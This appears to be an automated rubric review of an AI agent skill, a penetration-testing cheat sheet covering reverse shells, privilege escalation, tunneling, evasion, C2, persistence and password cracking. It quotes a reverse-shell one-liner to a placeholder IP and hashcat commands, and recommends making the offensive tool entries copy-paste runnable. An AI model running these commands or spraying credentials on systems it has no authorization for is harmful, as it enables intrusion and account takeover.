Content
76%Weight 40%Scale 1-5Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
An exceptionally token-efficient, tool-dense cheat sheet that assumes Claude's competence and gives runnable commands for many operations, including one well-validated credential-confirmation workflow. Its weaknesses are uneven actionability (tool names without syntax), mostly unsequenced checklist-style sections, and a single monolithic code block that suppresses navigability.
Suggestions
Add explicit sequencing to the privesc/tunneling/persistence sections (e.g. an enumeration-first → confirm-misconfig → exploit → validate order), mirroring the validate-then-confirm pattern already present in the RDP credential section.
For tools that are currently name-only (PrintSpoofer/GodPotato, chisel, ligolo-ng, crackmapexec, hashpump), include a minimal invocation example so each entry is copy-paste actionable like the hashcat and reverse-shell lines already are.
Break the single code block into per-section headers (反弹shell / 提权 / 横向 / 隧道 / 免杀 / C2 / 持久化 / 破解) or split deeper checklists into reference files, and convert cross-skill mentions like 'pentest-output-standards' and 'web-attack-methods' into clearly signaled links.
| Dimension | Reasoning | Score |
|---|---|---|
Conciseness | The body is a lean cheat sheet where every token is a command, tool name, or technique — e.g. 'sudo -l;SUID(GTFOBins);getcap;cron;可写文件' — with zero padding and no explanation of concepts Claude already knows. This matches the 'every token earns its place' anchor exactly. | 5 / 5 |
Actionability | Many lines are executable as written ('bash -i >& /dev/tcp/IP/4444 0>&1', the pty.spawn one-liner, 'hashcat -m <mode> hash wordlist -r rules/best64.rule' with concrete mode numbers like 1800/3200/13100), but a substantial share are tool name-drops without invocation syntax ('PrintSpoofer/GodPotato', 'chisel', 'ligolo-ng', 'crackmapexec', 'hashpump'). Mostly executable with gaps, so 4 rather than 5. | 4 / 5 |
Workflow Clarity | Sequencing and validation appear only in patches: the hash-cracking section has an ordered strategy ('先字典(rockyou)+规则→掩码?d?d?d?d→组合攻击 | john 兜底') and the RDP-credential section has a genuine validate-then-confirm loop (baseline wrong-password rdp_check → compare 'Connection reset' vs 'Access Denied' → confirm → spray other services). However the privesc, tunneling, evasion, and persistence sections are unsequenced parallel checklists with no checkpoints, which fits the 3 anchor ('sequence present but checkpoints missing or implicit') better than the 4 anchor. | 3 / 5 |
Progressive Disclosure | The body is under 50 lines with no bundle files, and is organized into two === sections under a ## header — good structure for a cheat sheet of this size. It falls short of 5 because everything is packed into a single monolithic code block with no navigable sections, and cross-skill references ('pentest-output-standards' 台账, 'web-attack-methods') are inline name-drops rather than clearly signaled links. | 4 / 5 |
Total | 16 / 20 Passed |